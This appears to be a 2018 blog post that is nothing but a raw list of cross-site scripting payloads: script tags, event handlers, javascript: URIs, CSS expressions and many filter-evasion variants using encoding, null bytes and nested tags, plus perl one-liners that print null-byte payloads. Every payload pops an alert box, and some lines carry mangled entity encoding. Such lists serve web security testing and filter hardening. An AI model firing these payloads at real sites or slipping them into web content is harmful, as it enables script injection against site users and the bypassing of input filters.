<;/TITLE>;<;SCRIPT>;alert(2475);<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
<;IMG SRC=";jav&#x09;ascript:alert(2477);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14;  javascript:alert(2484);";>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2486)>;
<;IMG SRC=";javascript:alert(2489)";
<;<;SCRIPT>;alert(2491);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
<;/script>;<;script>;alert(2612)<;/script>;
<;/br style=a:expression(alert(26132613>;
<;scrscriptipt>;alert(2614)<;/scrscriptipt>;
<;br size=\";&;{alert(2615)}\";>;
perl -e &#039;print \";<;IMG SRC=java\0script:alert(2616)>;\";;&#039; >; out
perl -e &#039;print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;&#039; >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2618))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2620))>
<~/XSS STYLE=xss:expression(alert(2621))>
"><script>alert(2622)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(2623))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(2624))>
XSS STYLE=xss:e/**/xpression(alert(2625))>
</XSS STYLE=xss:expression(alert(2626))>
>"><script>alert(2627)</script>&
"><STYLE>@import"javascript:alert(2628)";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(2629)>
>%22%27><img%20src%3d%22javascript:alert(2630)%22>
'%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
<IMG SRC="javascript:alert(2633);">
<IMG SRC=javascript:alert(2634)>
<IMG SRC=JaVaScRiPt:alert(2635)>
<IMG SRC=JaVaScRiPt:alert(2636)>
<IMG SRC="jav&#x0A;ascript:alert(2640);">
<IMG SRC="jav&#x0D;ascript:alert(2641);">
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(2643);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<script>alert(2649)</script>
%3cscript%3ealert(2650)%3c/script%3e
%22%3e%3cscript%3ealert(2651)%3c/script%3e
<IMG SRC="javascript:alert(2652);">
<IMG SRC=javascript:alert(2653)>
<IMG SRC=javascript:alert(2654)>
<img src=xss onerror=alert(2655)>
<IMG """><SCRIPT>alert(2656)</SCRIPT>">
<IMG SRC=javascript:alert(2657))>
<IMG SRC="jav ascript:alert(2658);">
<IMG SRC="jav&#x09;ascript:alert(2659);">
<BODY BACKGROUND="javascript:alert(2663)">
<BODY ONLOAD=alert(2664)>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2665);">
<IMG SRC="javascript:alert(2666)"
<<SCRIPT>alert(2668);//<</SCRIPT>
%253cscript%253ealert(2669)%253c/script%253e
"><s"%2b"cript>alert(2670)</script>
foo<script>alert(2671)</script>
<scr<script>ipt>alert(2672)</scr</script>ipt>
';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//--></SCRIPT>">'><SCRIPT>alert(2674))</SCRIPT>
<marquee onstart='javascript:alert(2675);'>=(◕_◕)=
</span></span><svg onload="alert(2676)//“ #"="">
<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(4)"></a>
<marquee width=1 loop=1 onfinish=alert(20)>XSS</marquee>
<a onclick="alert(52)">test</a>
<a onmouseleave="alert(71)">test</a>
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(108) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
<math><x href="javascript:alert(115)">blah
<form action="javascript:alert(124)"><input type=submit id=x></form><label for=x>XSS</label>
<img src=63 onerror=!function(){alert(63)}()>
<marquee loop=147 width=0 onfinish=alert(147)>
<brute style=font-size:500px onmouseover=alert(192)>000192
<iframe src=javascript:alert(197)>
<form><input formaction=javascript:alert(209) type=image src=http://brutelogic.com.br/webgun/img/youtube209.jpg>
<video src=289 href=289 onerror="javascript:alert(289)"></video>
<img src=287 href=287 onerror="javascript:alert(287)"></img>
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(362)> -->
<math href="javascript:javascript:alert(572)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(572)">CLICKME</maction> </math>
<style><img src="</style><img src=x onerror=javascript:alert(578)//">
<embed src="javascript:alert(586)">
<IMG SRC=# onmouseover="alert(723)">
<form><button formaction="javascript:alert(866)">lol

 

posted @ 2018-12-19 12:53  bmjoker  阅读(6560)  评论(0编辑  收藏  举报